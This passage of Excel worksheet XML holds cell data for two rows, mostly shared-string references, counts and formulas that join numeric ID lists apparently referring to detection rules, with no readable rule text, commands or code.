      <c r="NU102" s="127"/>
      <c r="NV102" s="127"/>
      <c r="NW102" s="127"/>
      <c r="NX102" s="127"/>
      <c r="NY102" s="127"/>
    </row>
    <row r="103" ht="153.75" customHeight="1">
      <c r="B103" s="89" t="s">
        <v>244</v>
      </c>
      <c r="C103" s="90" t="s">
        <v>427</v>
      </c>
      <c r="D103" s="90" t="s">
        <v>245</v>
      </c>
      <c r="E103" s="90" t="s">
        <v>1747</v>
      </c>
      <c r="F103" s="90" t="s">
        <v>1748</v>
      </c>
      <c r="G103" s="91" t="s">
        <v>1749</v>
      </c>
      <c r="H103" s="90" t="s">
        <v>1750</v>
      </c>
      <c r="I103" s="92" t="s">
        <v>1772</v>
      </c>
      <c r="J103" s="92" t="s">
        <v>1773</v>
      </c>
      <c r="K103" s="92" t="s">
        <v>1774</v>
      </c>
      <c r="L103" s="93" t="s">
        <v>1541</v>
      </c>
      <c r="M103" s="93">
        <v>3.0</v>
      </c>
      <c r="N103" s="93">
        <v>1.0</v>
      </c>
      <c r="O103" s="93">
        <v>0.0</v>
      </c>
      <c r="P103" s="93">
        <v>1.0</v>
      </c>
      <c r="Q103" s="93">
        <f t="shared" si="160"/>
        <v>1</v>
      </c>
      <c r="R103" s="93">
        <v>1.0</v>
      </c>
      <c r="S103" s="93">
        <v>0.0</v>
      </c>
      <c r="T103" s="94" t="s">
        <v>12</v>
      </c>
      <c r="U103" s="95" t="s">
        <v>224</v>
      </c>
      <c r="V103" s="96" t="s">
        <v>1542</v>
      </c>
      <c r="W103" s="96" t="s">
        <v>12</v>
      </c>
      <c r="X103" s="97" t="s">
        <v>1775</v>
      </c>
      <c r="Y103" s="96" t="s">
        <v>1776</v>
      </c>
      <c r="Z103" s="126" t="s">
        <v>1755</v>
      </c>
      <c r="AA103" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB103" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC103" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD103" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE103" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF103" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG103" s="98" t="s">
        <v>226</v>
      </c>
      <c r="AH103" s="99" t="s">
        <v>1777</v>
      </c>
      <c r="AI103" s="99" t="s">
        <v>481</v>
      </c>
      <c r="AJ103" s="99" t="s">
        <v>225</v>
      </c>
      <c r="AK103" s="100" t="s">
        <v>1757</v>
      </c>
      <c r="AL103" s="100">
        <v>4.0</v>
      </c>
      <c r="AM103" s="100">
        <v>36.0</v>
      </c>
      <c r="AN103" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO103" s="100" t="s">
        <v>1757</v>
      </c>
      <c r="AP103" s="100">
        <v>4.0</v>
      </c>
      <c r="AQ103" s="100">
        <v>36.0</v>
      </c>
      <c r="AR103" s="100" t="s">
        <v>1757</v>
      </c>
      <c r="AS103" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT103" s="100" t="str">
        <f t="shared" ref="AT103:AT122" si="164">IF(AR103="-",AS103,AR103)</f>
        <v>29456, 384, 366, 408</v>
      </c>
      <c r="AU103" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV103" s="100" t="s">
        <v>1757</v>
      </c>
      <c r="AW103" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX103" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY103" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ103" s="100">
        <v>0.0</v>
      </c>
      <c r="BA103" s="102">
        <v>3.0</v>
      </c>
      <c r="BB103" s="102">
        <v>0.0</v>
      </c>
      <c r="BC103" s="102">
        <v>7.0</v>
      </c>
      <c r="BD103" s="102">
        <v>36.0</v>
      </c>
      <c r="BE103" s="102">
        <v>0.0</v>
      </c>
      <c r="BF103" s="102">
        <v>0.0</v>
      </c>
      <c r="BG103" s="102">
        <v>0.0</v>
      </c>
      <c r="BH103" s="102">
        <v>0.0</v>
      </c>
      <c r="BI103" s="102">
        <v>0.0</v>
      </c>
      <c r="BJ103" s="102">
        <v>7.0</v>
      </c>
      <c r="BK103" s="102">
        <v>36.0</v>
      </c>
      <c r="BL103" s="103">
        <f t="shared" si="112"/>
        <v>0</v>
      </c>
      <c r="BM103" s="103">
        <f t="shared" si="113"/>
        <v>0</v>
      </c>
      <c r="BN103" s="103">
        <f t="shared" si="114"/>
        <v>0</v>
      </c>
      <c r="BO103" s="103">
        <f t="shared" si="115"/>
        <v>7</v>
      </c>
      <c r="BP103" s="103">
        <f t="shared" si="116"/>
        <v>7</v>
      </c>
      <c r="BQ103" s="103">
        <f t="shared" si="117"/>
        <v>0</v>
      </c>
      <c r="BR103" s="103">
        <f t="shared" si="118"/>
        <v>36</v>
      </c>
      <c r="BS103" s="103">
        <f t="shared" si="119"/>
        <v>36</v>
      </c>
      <c r="BT103" s="103">
        <f t="shared" si="120"/>
        <v>0</v>
      </c>
      <c r="BU103" s="103">
        <f t="shared" si="75"/>
        <v>0</v>
      </c>
      <c r="BV103" s="103">
        <f t="shared" si="76"/>
        <v>0</v>
      </c>
      <c r="BW103" s="104" t="s">
        <v>1778</v>
      </c>
      <c r="BX103" s="104">
        <v>5.0</v>
      </c>
      <c r="BY103" s="104">
        <v>46.0</v>
      </c>
      <c r="BZ103" s="101">
        <v>2100366.0</v>
      </c>
      <c r="CA103" s="104" t="s">
        <v>1757</v>
      </c>
      <c r="CB103" s="104">
        <v>4.0</v>
      </c>
      <c r="CC103" s="104">
        <v>36.0</v>
      </c>
      <c r="CD103" s="104" t="s">
        <v>1778</v>
      </c>
      <c r="CE103" s="104">
        <v>2100366.0</v>
      </c>
      <c r="CF103" s="104" t="str">
        <f t="shared" si="163"/>
        <v>2100366, 29456, 384, 366, 408</v>
      </c>
      <c r="CG103" s="105" t="s">
        <v>12</v>
      </c>
      <c r="CH103" s="104" t="s">
        <v>1778</v>
      </c>
      <c r="CI103" s="105" t="s">
        <v>12</v>
      </c>
      <c r="CJ103" s="105" t="s">
        <v>12</v>
      </c>
      <c r="CK103" s="104">
        <v>0.0</v>
      </c>
      <c r="CL103" s="104">
        <v>0.0</v>
      </c>
      <c r="CM103" s="105">
        <v>1.0</v>
      </c>
      <c r="CN103" s="105">
        <v>0.0</v>
      </c>
      <c r="CO103" s="105">
        <v>7.0</v>
      </c>
      <c r="CP103" s="105">
        <v>36.0</v>
      </c>
      <c r="CQ103" s="105">
        <v>10.0</v>
      </c>
      <c r="CR103" s="105">
        <v>36.0</v>
      </c>
      <c r="CS103" s="105">
        <v>0.0</v>
      </c>
      <c r="CT103" s="105">
        <v>0.0</v>
      </c>
      <c r="CU103" s="105">
        <v>0.0</v>
      </c>
      <c r="CV103" s="105">
        <v>0.0</v>
      </c>
      <c r="CW103" s="105">
        <v>0.0</v>
      </c>
      <c r="CX103" s="105">
        <v>7.0</v>
      </c>
      <c r="CY103" s="105">
        <v>36.0</v>
      </c>
      <c r="CZ103" s="105">
        <v>0.0</v>
      </c>
      <c r="DA103" s="105">
        <v>36.0</v>
      </c>
      <c r="DB103" s="106">
        <f t="shared" si="122"/>
        <v>0</v>
      </c>
      <c r="DC103" s="106">
        <f t="shared" si="123"/>
        <v>0</v>
      </c>
      <c r="DD103" s="106">
        <f t="shared" si="124"/>
        <v>0</v>
      </c>
      <c r="DE103" s="106">
        <f t="shared" si="125"/>
        <v>7</v>
      </c>
      <c r="DF103" s="106">
        <f t="shared" si="126"/>
        <v>7</v>
      </c>
      <c r="DG103" s="106">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="DH103" s="106">
        <f t="shared" si="127"/>
        <v>36</v>
      </c>
      <c r="DI103" s="106">
        <f t="shared" si="128"/>
        <v>36</v>
      </c>
      <c r="DJ103" s="106">
        <f t="shared" si="129"/>
        <v>0</v>
      </c>
      <c r="DK103" s="107">
        <f t="shared" si="104"/>
        <v>0</v>
      </c>
      <c r="DL103" s="106">
        <f t="shared" si="105"/>
        <v>0</v>
      </c>
      <c r="DM103" s="108" t="s">
        <v>1778</v>
      </c>
      <c r="DN103" s="108">
        <v>5.0</v>
      </c>
      <c r="DO103" s="108">
        <v>46.0</v>
      </c>
      <c r="DP103" s="101">
        <v>2100366.0</v>
      </c>
      <c r="DQ103" s="108" t="s">
        <v>1757</v>
      </c>
      <c r="DR103" s="108">
        <v>4.0</v>
      </c>
      <c r="DS103" s="108">
        <v>35.0</v>
      </c>
      <c r="DT103" s="108" t="s">
        <v>1778</v>
      </c>
      <c r="DU103" s="108">
        <v>2100366.0</v>
      </c>
      <c r="DV103" s="108" t="str">
        <f t="shared" si="154"/>
        <v>2100366, 29456, 384, 366, 408</v>
      </c>
      <c r="DW103" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DX103" s="108" t="s">
        <v>1778</v>
      </c>
      <c r="DY103" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DZ103" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA103" s="108">
        <v>0.0</v>
      </c>
      <c r="EB103" s="108">
        <v>0.0</v>
      </c>
      <c r="EC103" s="109">
        <v>6.0</v>
      </c>
      <c r="ED103" s="109">
        <v>0.0</v>
      </c>
      <c r="EE103" s="109">
        <v>7.0</v>
      </c>
      <c r="EF103" s="109">
        <v>36.0</v>
      </c>
      <c r="EG103" s="109">
        <v>10.0</v>
      </c>
      <c r="EH103" s="109">
        <v>36.0</v>
      </c>
      <c r="EI103" s="109">
        <v>0.0</v>
      </c>
      <c r="EJ103" s="109">
        <v>0.0</v>
      </c>
      <c r="EK103" s="109">
        <v>0.0</v>
      </c>
      <c r="EL103" s="109">
        <v>0.0</v>
      </c>
      <c r="EM103" s="109">
        <v>0.0</v>
      </c>
      <c r="EN103" s="109">
        <v>7.0</v>
      </c>
      <c r="EO103" s="109">
        <v>36.0</v>
      </c>
      <c r="EP103" s="109">
        <v>0.0</v>
      </c>
      <c r="EQ103" s="109">
        <v>36.0</v>
      </c>
      <c r="ER103" s="110">
        <f t="shared" si="130"/>
        <v>0</v>
      </c>
      <c r="ES103" s="110">
        <f t="shared" si="131"/>
        <v>0</v>
      </c>
      <c r="ET103" s="110">
        <f t="shared" si="132"/>
        <v>0</v>
      </c>
      <c r="EU103" s="110">
        <f t="shared" si="133"/>
        <v>7</v>
      </c>
      <c r="EV103" s="110">
        <f t="shared" si="134"/>
        <v>7</v>
      </c>
      <c r="EW103" s="110">
        <f t="shared" si="135"/>
        <v>0</v>
      </c>
      <c r="EX103" s="110">
        <f t="shared" si="136"/>
        <v>36</v>
      </c>
      <c r="EY103" s="110">
        <f t="shared" si="137"/>
        <v>36</v>
      </c>
      <c r="EZ103" s="110">
        <f t="shared" si="138"/>
        <v>0</v>
      </c>
      <c r="FA103" s="110">
        <f t="shared" si="106"/>
        <v>0</v>
      </c>
      <c r="FB103" s="110">
        <f t="shared" si="107"/>
        <v>0</v>
      </c>
      <c r="FC103" s="111" t="s">
        <v>1779</v>
      </c>
      <c r="FD103" s="111">
        <v>9.0</v>
      </c>
      <c r="FE103" s="111">
        <v>46.0</v>
      </c>
      <c r="FF103" s="101" t="s">
        <v>1780</v>
      </c>
      <c r="FG103" s="111" t="s">
        <v>1757</v>
      </c>
      <c r="FH103" s="111">
        <v>4.0</v>
      </c>
      <c r="FI103" s="111">
        <v>36.0</v>
      </c>
      <c r="FJ103" s="111" t="s">
        <v>1779</v>
      </c>
      <c r="FK103" s="111" t="s">
        <v>1780</v>
      </c>
      <c r="FL103" s="111" t="str">
        <f t="shared" si="155"/>
        <v>29456, 384, 366, 408, 2100366, 2100384, 2002752, 2002749, 2100408</v>
      </c>
      <c r="FM103" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FN103" s="111" t="s">
        <v>1779</v>
      </c>
      <c r="FO103" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FP103" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ103" s="111">
        <v>0.0</v>
      </c>
      <c r="FR103" s="111">
        <v>0.0</v>
      </c>
      <c r="FS103" s="112">
        <v>5.0</v>
      </c>
      <c r="FT103" s="112">
        <v>0.0</v>
      </c>
      <c r="FU103" s="112">
        <v>7.0</v>
      </c>
      <c r="FV103" s="112">
        <v>36.0</v>
      </c>
      <c r="FW103" s="112">
        <v>30.0</v>
      </c>
      <c r="FX103" s="112">
        <v>40.0</v>
      </c>
      <c r="FY103" s="112">
        <v>0.0</v>
      </c>
      <c r="FZ103" s="112">
        <v>0.0</v>
      </c>
      <c r="GA103" s="112">
        <v>0.0</v>
      </c>
      <c r="GB103" s="112">
        <v>0.0</v>
      </c>
      <c r="GC103" s="112">
        <v>0.0</v>
      </c>
      <c r="GD103" s="112">
        <v>7.0</v>
      </c>
      <c r="GE103" s="112">
        <v>36.0</v>
      </c>
      <c r="GF103" s="112">
        <v>0.0</v>
      </c>
      <c r="GG103" s="112">
        <v>36.0</v>
      </c>
      <c r="GH103" s="113">
        <f t="shared" si="139"/>
        <v>0</v>
      </c>
      <c r="GI103" s="113">
        <f t="shared" si="140"/>
        <v>0</v>
      </c>
      <c r="GJ103" s="113">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="GK103" s="113">
        <f t="shared" si="142"/>
        <v>7</v>
      </c>
      <c r="GL103" s="113">
        <f t="shared" si="143"/>
        <v>7</v>
      </c>
      <c r="GM103" s="113">
        <f t="shared" si="144"/>
        <v>0</v>
      </c>
      <c r="GN103" s="113">
        <f t="shared" si="145"/>
        <v>40</v>
      </c>
      <c r="GO103" s="113">
        <f t="shared" si="146"/>
        <v>36</v>
      </c>
      <c r="GP103" s="113">
        <f t="shared" si="147"/>
        <v>0</v>
      </c>
      <c r="GQ103" s="114">
        <f t="shared" si="108"/>
        <v>0</v>
      </c>
      <c r="GR103" s="113">
        <f t="shared" si="109"/>
        <v>0</v>
      </c>
      <c r="GS103" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT103" s="94" t="s">
        <v>1781</v>
      </c>
      <c r="GU103" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GV103" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GW103" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GX103" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY103" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ103" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA103" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB103" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC103" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD103" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HE103" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HF103" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG103" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH103" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HI103" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ103" s="93" t="s">
        <v>12</v>
      </c>
      <c r="HK103" s="93" t="str">
        <f t="shared" si="51"/>
        <v>NO</v>
      </c>
      <c r="HL103" s="93">
        <v>4.0</v>
      </c>
      <c r="HM103" s="93">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="HN103" s="93">
        <v>0.0</v>
      </c>
      <c r="HO103" s="93">
        <v>0.0</v>
      </c>
      <c r="HP103" s="93">
        <v>0.0</v>
      </c>
      <c r="HQ103" s="118">
        <f t="shared" si="53"/>
        <v>0</v>
      </c>
      <c r="HR103" s="118">
        <f t="shared" si="54"/>
        <v>0</v>
      </c>
      <c r="HS103" s="118">
        <f t="shared" si="55"/>
        <v>0</v>
      </c>
      <c r="HT103" s="139" t="s">
        <v>12</v>
      </c>
      <c r="HU103" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV103" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HW103" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HX103" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HY103" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ103" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA103" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB103" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC103" s="120" t="str">
        <f t="shared" si="162"/>
        <v>-</v>
      </c>
      <c r="ID103" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IE103" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IF103" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IG103" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH103" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II103" s="99" t="s">
        <v>12</v>
      </c>
      <c r="IJ103" s="98" t="str">
        <f t="shared" si="56"/>
        <v>NO</v>
      </c>
      <c r="IK103" s="99">
        <v>3.0</v>
      </c>
      <c r="IL103" s="99">
        <v>0.0</v>
      </c>
      <c r="IM103" s="121">
        <f t="shared" si="159"/>
        <v>0</v>
      </c>
      <c r="IN103" s="122" t="s">
        <v>230</v>
      </c>
      <c r="IO103" s="98">
        <v>0.0</v>
      </c>
      <c r="IP103" s="123">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="IQ103" s="118">
        <f t="shared" si="59"/>
        <v>0</v>
      </c>
      <c r="IR103" s="118">
        <f t="shared" si="60"/>
        <v>0</v>
      </c>
      <c r="IS103" s="124" t="s">
        <v>225</v>
      </c>
      <c r="IT103" s="127"/>
      <c r="IU103" s="127"/>
      <c r="IV103" s="127"/>
      <c r="IW103" s="127"/>
      <c r="IX103" s="127"/>
      <c r="IY103" s="127"/>
      <c r="IZ103" s="127"/>
      <c r="JA103" s="127"/>
      <c r="JB103" s="127"/>
      <c r="JC103" s="127"/>
      <c r="JD103" s="127"/>
      <c r="JE103" s="127"/>
      <c r="JF103" s="127"/>
      <c r="JG103" s="127"/>
      <c r="JH103" s="127"/>
      <c r="JI103" s="127"/>
      <c r="JJ103" s="127"/>
      <c r="JK103" s="127"/>
      <c r="JL103" s="127"/>
      <c r="JM103" s="127"/>
      <c r="JN103" s="127"/>
      <c r="JO103" s="127"/>
      <c r="JP103" s="127"/>
      <c r="JQ103" s="127"/>
      <c r="JR103" s="127"/>
      <c r="JS103" s="127"/>
      <c r="JT103" s="127"/>
      <c r="JU103" s="127"/>
      <c r="JV103" s="127"/>
      <c r="JW103" s="127"/>
      <c r="JX103" s="127"/>
      <c r="JY103" s="127"/>
      <c r="JZ103" s="127"/>
      <c r="KA103" s="127"/>
      <c r="KB103" s="127"/>
      <c r="KC103" s="127"/>
      <c r="KD103" s="127"/>
      <c r="KE103" s="127"/>
      <c r="KF103" s="127"/>
      <c r="KG103" s="127"/>
      <c r="KH103" s="127"/>
      <c r="KI103" s="127"/>
      <c r="KJ103" s="127"/>
      <c r="KK103" s="127"/>
      <c r="KL103" s="127"/>
      <c r="KM103" s="127"/>
      <c r="KN103" s="127"/>
      <c r="KO103" s="127"/>
      <c r="KP103" s="127"/>
      <c r="KQ103" s="127"/>
      <c r="KR103" s="127"/>
      <c r="KS103" s="127"/>
      <c r="KT103" s="127"/>
      <c r="KU103" s="127"/>
      <c r="KV103" s="127"/>
      <c r="KW103" s="127"/>
      <c r="KX103" s="127"/>
      <c r="KY103" s="127"/>
      <c r="KZ103" s="127"/>
      <c r="LA103" s="127"/>
      <c r="LB103" s="127"/>
      <c r="LC103" s="127"/>
      <c r="LD103" s="127"/>
      <c r="LE103" s="127"/>
      <c r="LF103" s="127"/>
      <c r="LG103" s="127"/>
      <c r="LH103" s="127"/>
      <c r="LI103" s="127"/>
      <c r="LJ103" s="127"/>
      <c r="LK103" s="127"/>
      <c r="LL103" s="127"/>
      <c r="LM103" s="127"/>
      <c r="LN103" s="127"/>
      <c r="LO103" s="127"/>
      <c r="LP103" s="127"/>
      <c r="LQ103" s="127"/>
      <c r="LR103" s="127"/>
      <c r="LS103" s="127"/>
      <c r="LT103" s="127"/>
      <c r="LU103" s="127"/>
      <c r="LV103" s="127"/>
      <c r="LW103" s="127"/>
      <c r="LX103" s="127"/>
      <c r="LY103" s="127"/>
      <c r="LZ103" s="127"/>
      <c r="MA103" s="127"/>
      <c r="MB103" s="127"/>
      <c r="MC103" s="127"/>
      <c r="MD103" s="127"/>
      <c r="ME103" s="127"/>
      <c r="MF103" s="127"/>
      <c r="MG103" s="127"/>
      <c r="MH103" s="127"/>
      <c r="MI103" s="127"/>
      <c r="MJ103" s="127"/>
      <c r="MK103" s="127"/>
      <c r="ML103" s="127"/>
      <c r="MM103" s="127"/>
      <c r="MN103" s="127"/>
      <c r="MO103" s="127"/>
      <c r="MP103" s="127"/>
      <c r="MQ103" s="127"/>
      <c r="MR103" s="127"/>
      <c r="MS103" s="127"/>
      <c r="MT103" s="127"/>
      <c r="MU103" s="127"/>
      <c r="MV103" s="127"/>
      <c r="MW103" s="127"/>
      <c r="MX103" s="127"/>
      <c r="MY103" s="127"/>
      <c r="MZ103" s="127"/>
      <c r="NA103" s="127"/>
      <c r="NB103" s="127"/>
      <c r="NC103" s="127"/>
      <c r="ND103" s="127"/>
      <c r="NE103" s="127"/>
      <c r="NF103" s="127"/>
      <c r="NG103" s="127"/>
      <c r="NH103" s="127"/>
      <c r="NI103" s="127"/>
      <c r="NJ103" s="127"/>
      <c r="NK103" s="127"/>
      <c r="NL103" s="127"/>
      <c r="NM103" s="127"/>
      <c r="NN103" s="127"/>
      <c r="NO103" s="127"/>
      <c r="NP103" s="127"/>
      <c r="NQ103" s="127"/>
      <c r="NR103" s="127"/>
      <c r="NS103" s="127"/>
      <c r="NT103" s="127"/>
      <c r="NU103" s="127"/>
      <c r="NV103" s="127"/>
      <c r="NW103" s="127"/>
      <c r="NX103" s="127"/>
      <c r="NY103" s="127"/>
    </row>
    <row r="104" ht="153.75" customHeight="1">
      <c r="B104" s="89" t="s">
        <v>244</v>
      </c>
      <c r="C104" s="90" t="s">
        <v>427</v>
      </c>
      <c r="D104" s="90" t="s">
        <v>245</v>
      </c>
      <c r="E104" s="90" t="s">
        <v>1747</v>
      </c>
      <c r="F104" s="90" t="s">
        <v>1748</v>
      </c>
      <c r="G104" s="91" t="s">
        <v>12</v>
      </c>
      <c r="H104" s="90" t="s">
        <v>12</v>
      </c>
      <c r="I104" s="92" t="s">
        <v>1782</v>
      </c>
      <c r="J104" s="92" t="s">
        <v>1453</v>
      </c>
      <c r="K104" s="92" t="s">
        <v>1783</v>
      </c>
      <c r="L104" s="93" t="s">
        <v>1455</v>
      </c>
      <c r="M104" s="93">
        <v>6.0</v>
      </c>
      <c r="N104" s="93">
        <v>1.0</v>
      </c>
      <c r="O104" s="93">
        <v>0.0</v>
      </c>
      <c r="P104" s="93">
        <v>1.0</v>
      </c>
      <c r="Q104" s="93">
        <f t="shared" si="160"/>
        <v>1</v>
      </c>
      <c r="R104" s="93">
        <v>1.0</v>
      </c>
      <c r="S104" s="93">
        <v>0.0</v>
      </c>
      <c r="T104" s="94" t="s">
        <v>12</v>
      </c>
      <c r="U104" s="95" t="s">
        <v>401</v>
      </c>
      <c r="V104" s="96" t="s">
        <v>1784</v>
      </c>
      <c r="W104" s="96" t="s">
        <v>1785</v>
      </c>
      <c r="X104" s="97" t="s">
        <v>1786</v>
      </c>
      <c r="Y104" s="96" t="s">
        <v>1787</v>
      </c>
      <c r="Z104" s="126" t="s">
        <v>1755</v>
      </c>
      <c r="AA104" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB104" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC104" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD104" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE104" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF104" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG104" s="98" t="s">
        <v>226</v>
      </c>
      <c r="AH104" s="99" t="s">
        <v>1788</v>
      </c>
      <c r="AI104" s="99" t="s">
        <v>481</v>
      </c>
      <c r="AJ104" s="99" t="s">
        <v>225</v>
      </c>
      <c r="AK104" s="100" t="s">
        <v>1757</v>
      </c>
      <c r="AL104" s="100">
        <v>4.0</v>
      </c>
      <c r="AM104" s="100">
        <v>36.0</v>
      </c>
      <c r="AN104" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO104" s="100" t="s">
        <v>1757</v>
      </c>
      <c r="AP104" s="100">
        <v>4.0</v>
      </c>
      <c r="AQ104" s="100">
        <v>36.0</v>
      </c>
      <c r="AR104" s="100" t="s">
        <v>1757</v>
      </c>
      <c r="AS104" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT104" s="100" t="str">
        <f t="shared" si="164"/>
        <v>29456, 384, 366, 408</v>
      </c>
      <c r="AU104" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV104" s="100" t="s">
        <v>1757</v>
      </c>
      <c r="AW104" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX104" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY104" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ104" s="100">
        <v>0.0</v>
      </c>
      <c r="BA104" s="102">
        <v>1.0</v>
      </c>
      <c r="BB104" s="102">
        <v>0.0</v>
      </c>
      <c r="BC104" s="102">
        <v>14.0</v>
      </c>
      <c r="BD104" s="102">
        <v>56.0</v>
      </c>
      <c r="BE104" s="102">
        <v>0.0</v>
      </c>
      <c r="BF104" s="102">
        <v>0.0</v>
      </c>
      <c r="BG104" s="102">
        <v>0.0</v>
      </c>
      <c r="BH104" s="102">
        <v>0.0</v>
      </c>
      <c r="BI104" s="102">
        <v>0.0</v>
      </c>
      <c r="BJ104" s="102">
        <v>14.0</v>
      </c>
      <c r="BK104" s="102">
        <v>56.0</v>
      </c>
      <c r="BL104" s="103">
        <f t="shared" si="112"/>
        <v>0</v>
      </c>
      <c r="BM104" s="103">
        <f t="shared" si="113"/>
        <v>0</v>
      </c>
      <c r="BN104" s="103">
        <f t="shared" si="114"/>
        <v>0</v>
      </c>
      <c r="BO104" s="103">
        <f t="shared" si="115"/>
        <v>14</v>
      </c>
      <c r="BP104" s="103">
        <f t="shared" si="116"/>
        <v>14</v>
      </c>
      <c r="BQ104" s="103">
        <f t="shared" si="117"/>
        <v>0</v>
      </c>
      <c r="BR104" s="103">
        <f t="shared" si="118"/>
        <v>56</v>
      </c>
      <c r="BS104" s="103">
        <f t="shared" si="119"/>
        <v>56</v>
      </c>
      <c r="BT104" s="103">
        <f t="shared" si="120"/>
        <v>0</v>
      </c>
      <c r="BU104" s="103">
        <f t="shared" si="75"/>
        <v>0</v>
      </c>
      <c r="BV104" s="103">
        <f t="shared" si="76"/>
        <v>0</v>
      </c>
      <c r="BW104" s="104" t="s">
        <v>1778</v>
      </c>
      <c r="BX104" s="104">
        <v>5.0</v>
      </c>
      <c r="BY104" s="104">
        <v>70.0</v>
      </c>
      <c r="BZ104" s="101">
        <v>2100366.0</v>
      </c>
      <c r="CA104" s="104" t="s">
        <v>1757</v>
      </c>
      <c r="CB104" s="104">
        <v>4.0</v>
      </c>
      <c r="CC104" s="104">
        <v>44.0</v>
      </c>
      <c r="CD104" s="104" t="s">
        <v>1778</v>
      </c>
      <c r="CE104" s="104">
        <v>2100366.0</v>
      </c>
      <c r="CF104" s="104" t="str">
        <f t="shared" si="163"/>
        <v>2100366, 29456, 384, 366, 408</v>
      </c>
      <c r="CG104" s="105" t="s">
        <v>12</v>
      </c>
      <c r="CH104" s="104" t="s">
        <v>1778</v>
      </c>
      <c r="CI104" s="105" t="s">
        <v>12</v>
      </c>
      <c r="CJ104" s="105" t="s">
        <v>12</v>
      </c>
      <c r="CK104" s="105" t="s">
        <v>12</v>
      </c>
      <c r="CL104" s="105" t="s">
        <v>12</v>
      </c>
      <c r="CM104" s="105">
        <v>0.0</v>
      </c>
      <c r="CN104" s="105">
        <v>0.0</v>
      </c>
      <c r="CO104" s="105">
        <v>14.0</v>
      </c>
      <c r="CP104" s="105">
        <v>56.0</v>
      </c>
      <c r="CQ104" s="105">
        <v>14.0</v>
      </c>
      <c r="CR104" s="105">
        <v>56.0</v>
      </c>
      <c r="CS104" s="105">
        <v>0.0</v>
      </c>
      <c r="CT104" s="105">
        <v>0.0</v>
      </c>
      <c r="CU104" s="105">
        <v>0.0</v>
      </c>
      <c r="CV104" s="105">
        <v>0.0</v>
      </c>
      <c r="CW104" s="105">
        <v>0.0</v>
      </c>
      <c r="CX104" s="105">
        <v>14.0</v>
      </c>
      <c r="CY104" s="105">
        <v>56.0</v>
      </c>
      <c r="CZ104" s="105">
        <v>0.0</v>
      </c>
      <c r="DA104" s="105">
        <v>56.0</v>
      </c>
      <c r="DB104" s="106">
        <f t="shared" si="122"/>
        <v>0</v>
      </c>
      <c r="DC104" s="106">
        <f t="shared" si="123"/>
        <v>0</v>
      </c>
      <c r="DD104" s="106">
        <f t="shared" si="124"/>
        <v>0</v>
      </c>
      <c r="DE104" s="106">
        <f t="shared" si="125"/>
        <v>14</v>
      </c>
      <c r="DF104" s="106">
        <f t="shared" si="126"/>
        <v>14</v>
      </c>
      <c r="DG104" s="106">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="DH104" s="106">
        <f t="shared" si="127"/>
        <v>56</v>
      </c>
      <c r="DI104" s="106">
        <f t="shared" si="128"/>
        <v>56</v>
      </c>
      <c r="DJ104" s="106">
        <f t="shared" si="129"/>
        <v>0</v>
      </c>
      <c r="DK104" s="107">
        <f t="shared" si="104"/>
        <v>0</v>
      </c>
      <c r="DL104" s="106">
        <f t="shared" si="105"/>
        <v>0</v>
      </c>
      <c r="DM104" s="108" t="s">
        <v>1778</v>
      </c>
